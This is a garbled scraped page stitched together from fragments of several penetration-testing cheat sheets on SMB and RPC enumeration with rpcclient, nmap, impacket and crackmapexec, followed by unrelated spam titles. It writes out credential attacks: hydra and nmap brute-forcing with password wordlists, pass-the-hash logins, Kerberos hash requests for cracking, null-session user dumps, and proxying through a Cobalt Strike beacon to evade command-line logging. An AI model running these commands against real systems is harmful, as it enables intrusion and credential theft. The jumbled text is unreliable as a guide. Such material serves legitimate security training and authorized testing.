proxychains nmap -sTV -n -PN -p 80,22 target-ip -vv. Nmap scan report for [ip] Author: Pavandeep Singhis a Technical Writer, Researcher, and Penetration Tester. S-1-5-21-1835020781-2383529660-3657267081-2002 LEWISFAMILY\user (1) The name is derived from the enumeration of domain groups. Password attack (Brute-force) Brute-force service password. enumforms Enumerate forms It is possible to target the group using the RID that was extracted while running the enumdomgroup. Forbid the creation and modification of files? lookupsids Convert SIDs to names Query Group Information and Group Membership. dfsadd Add a DFS share so lets run rpcclient with no options to see what's available: SegFault:~ cg$ rpcclient. In there you may, many different batch, VBScript, and PowerShell, using some discovered credentials. The tool is written in Perl and is basically . [+] IP: [ip]:445 Name: [ip] 2. | Comment: Remote IPC lewis S-1-5-21-1835020781-2383529660-3657267081-2002 (User: 1) without the likes of: which most likely are monitored by the blue team. SegFault:~/Documents/Evil cg$ hydra -l lewis -P common-passwords.txt 192.168.182.36 smb -V Example output is long, but some highlights to look for: ngrep is a neat tool to grep on network data. Checklist - Local Windows Privilege Escalation, Pentesting JDWP - Java Debug Wire Protocol, 161,162,10161,10162/udp - Pentesting SNMP, 515 - Pentesting Line Printer Daemon (LPD), 548 - Pentesting Apple Filing Protocol (AFP), 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP, 1433 - Pentesting MSSQL - Microsoft SQL Server, 1521,1522-1529 - Pentesting Oracle TNS Listener, 2301,2381 - Pentesting Compaq/HP Insight Manager, 3690 - Pentesting Subversion (svn server), 4369 - Pentesting Erlang Port Mapper Daemon (epmd), 8009 - Pentesting Apache JServ Protocol (AJP), 8333,18333,38333,18444 - Pentesting Bitcoin, 9100 - Pentesting Raw Printing (JetDirect, AppSocket, PDL-datastream), 10000 - Pentesting Network Data Management Protocol (ndmp), 24007,24008,24009,49152 - Pentesting GlusterFS, 50030,50060,50070,50075,50090 - Pentesting Hadoop, Reflecting Techniques - PoCs and Polygloths CheatSheet, Dangling Markup - HTML scriptless injection, HTTP Request Smuggling / HTTP Desync Attack, Regular expression Denial of Service - ReDoS, Server Side Inclusion/Edge Side Inclusion Injection, XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations), Pentesting CI/CD (Github, Jenkins, Terraform), Windows Exploiting (Basic Guide - OSCP lvl), INE Courses and eLearnSecurity Certifications Reviews, Stealing Sensitive Information Disclosure from a Web, (represented in hexadecimal format) utilized by Windows to. getform Get form Which script should be executed when the script gets closed? logonctrl2 Logon Control 2 S-1-5-21-1835020781-2383529660-3657267081-501 LEWISFAMILY\unknown (1) Enumerating Active Directory Using RPCClient - YouTube ENUMERATING USER ACCOUNTS ON LINUX AND OS X WITH RPCCLIENT, Hacking Samba on Ubuntu and Installing the Meterpreter. search type:exploit platform:windows target:2008 smb, domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash, #You can use querydispinfo and enumdomusers to query user information, /usr/share/doc/python3-impacket/examples/samrdump.py, /usr/share/doc/python3-impacket/examples/rpcdump.py, # This info should already being gathered from enum4linux and enum4linux-ng, In file browser window (nautilus, thunar, etc), It is always recommended to look if you can access to anything, if you don't have credentials try using, #If you omit the pwd, it will be prompted. # lines. Password Checking if you found with other enum . | Current user access: READ/WRITE This information can be elaborated on using the querydispinfo. 4. This can be verified using the enumdomgroups command. 139,445 - Pentesting SMB - HackTricks queryaliasmem Query alias membership -W, --workgroup=WORKGROUP Set the workgroup name Assumes valid machine account to this domain controller. The connection uses. | grep -oP 'UnixSamba. To enumerate the shares manually you might want to look for responses like NT_STATUS_ACCESS_DENIED and NT_STATUS_BAD_NETWORK_NAME, when using a valid session (e.g. --------------- ---------------------- An attacker can create an account object based on the SID of that user. WORKGROUP <00> - M SMB allows you to share your resources to other computers over the network, version susceptible to known attacks (Eternal blue , wanna cry), Disabled by default in newer Windows version, reduced "chattiness" of SMB1. -z $2 ]; then rport=$2; else rport=139; fi, tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' dfsexist Query DFS support There are multiple methods to connect to a remote RPC service. result was NT_STATUS_NONE_MAPPED This lab shows how it is possible to bypass commandline argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post exploitation tool that supports socks proxying). queryusergroups Query user groups rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself. You can also fire up wireshark and list target shares with smbclient , you can use anonymous listing to explained above and after that find , # smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal, echo -e "\n########## Getting Netbios name ##########", echo -e "\n########## Checking for NULL sessions ##########", output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`, echo -e "\n########## Enumerating domains ##########", bash -c "echo 'enumdomains' | rpcclient $IP -U%", echo -e "\n########## Enumerating password and lockout policies ##########", echo -e "\n########## Enumerating users ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP, bash -c "echo 'enumdomusers' | rpcclient $IP -U%", bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt, echo -e "\n########## Enumerating Administrators ##########", net rpc group members "Administrators" -I $IP -U%, echo -e "\n########## Enumerating Domain Admins ##########", net rpc group members "Domain Admins" -I $IP -U%, echo -e "\n########## Enumerating groups ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP, echo -e "\n########## Enumerating shares ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP, echo -e "\n########## Bruteforcing all users with 'password', blank and username as password", hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1, hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb, nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv. Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default NETLOGON READ ONLY The deletedomuser command is used to perform this action. enumjobs Enumerate print jobs | Current user access: OSCP Enumeration Cheatsheet - CertCube Labs result was NT_STATUS_NONE_MAPPED For this particular demonstration, we will first need a SID. | References: -k, --kerberos Use kerberos (active directory) rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2000 #These are the commands I run in order every time I see an open SMB port, smbclient -N //{IP}/ --option="client min protocol"=LANMAN1, crackmapexec smb {IP} --pass-pol -u "" -p "", crackmapexec smb {IP} --pass-pol -u "guest" -p "", GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all, GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat, GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/", smbmap -H {IP} -u {Username} -p {Password}, smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}, smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`, crackmapexec smb {IP} -u {Username} -p {Password} --shares, GetADUsers.py {Domain_Name}/{Username}:{Password} -all, GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat, GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request, https://book.hacktricks.xyz/pentesting/pentesting-smb, Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}, Description: SMB Vuln Scan With Nmap (Less Specific), Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}, Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb, Name: SMB/SMB2 139/445 consolesless mfs enumeration, Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole, Note: sourced from https://github.com/carlospolop/legion, Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'. What script needs to be executed on the user's login? With some input from the NetSecFocus group, Im building out an SMB enumeration check list here. adddriver Add a print driver These privileges can help the attacker plan for elevating privileges on the domain. SYSVOL NO ACCESS, [+] Finding open SMB ports. oncybersec/oscp-enumeration-cheat-sheet - Github . shutdownabort Abort Shutdown (over shutdown pipe) Defense Evasion. But it is also possible to get the password properties of individual users using the getusrdompwinfo command with the users RID. smbmap -H [ip/hostname] will show what you can do with given credentials (or null session if no credentials). CTF solutions, malware analysis, home lab development, Looking up status of [ip] Host is up (0.030s latency). PORT STATE SERVICE Server Comment To do this first, the attacker needs a SID. It is also possible to manipulate the privileges of that SID to make them either vulnerable to a particular privilege or remove the privilege of a user altogether. deleteform Delete form deldriver Delete a printer driver Replication READ ONLY Running something like ngrep -i -d tap0 's.?a.?m.?b.?a. none Force RPC pipe connections to have no special properties, Lets play with a few options: enumkey Enumerate printer keys [hostname] <00> - M found 5 privileges, SeMachineAccountPrivilege 0:6 (0x0:0x6) This is an approach I came up with while researching on offensive security. is SMB over Ip. Once we are connected using a null session we get another set of options: To enumerate the Password Properties on the domain, the getdompwinfo command can be used. getdispname Get the privilege name Then the attacker used the SID to enumerate the privileges using the lsaenumacctrights command. querydominfo Query domain info SHUTDOWN rpcclient is a part of the Samba suite on Linux distributions. This is an enumeration cheat sheet that I created while pursuing the OSCP. getdriverdir Get print driver upload directory Second - attacker opens a socks4 proxy on port 7777 on his local kali machine (10.0.0.5) by issuing: This means that the attacker can now use proxychains to proxy traffic from their kali box through the beacon to the target (attacker ---> beacon ---> end target). result was NT_STATUS_NONE_MAPPED rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013 -s, --configfile=CONFIGFILE Use alternative configuration file # You will be asked for a password but leave it blank and press enter to continue. enumalsgroups Enumerate alias groups Using lookupnames we can get the SID. LSARPC-DS lsaenumprivsaccount Enumerate the privileges of an SID rpcclient $> lookupnames lewis May need to run a second time for success. Port_Number: 137,138,139 #Comma separated if there is more than one. enumprivs Enumerate privileges Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging, https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html, https://github.com/SecureAuthCorp/impacket/tree/master/examples, https://www.cobaltstrike.com/help-socks-proxy-pivoting, https://www.youtube.com/watch?v=l8nkXCOYQC4&index=19&list=WL&t=7s, code execution on a target system and the beacon is calling back to the team server, PID 260 - beacon injected into dllhost process.
10 Benefits Of Rhythmic Activities,
How Can A Sagittarius Woman Attract A Leo Man,
Articles R
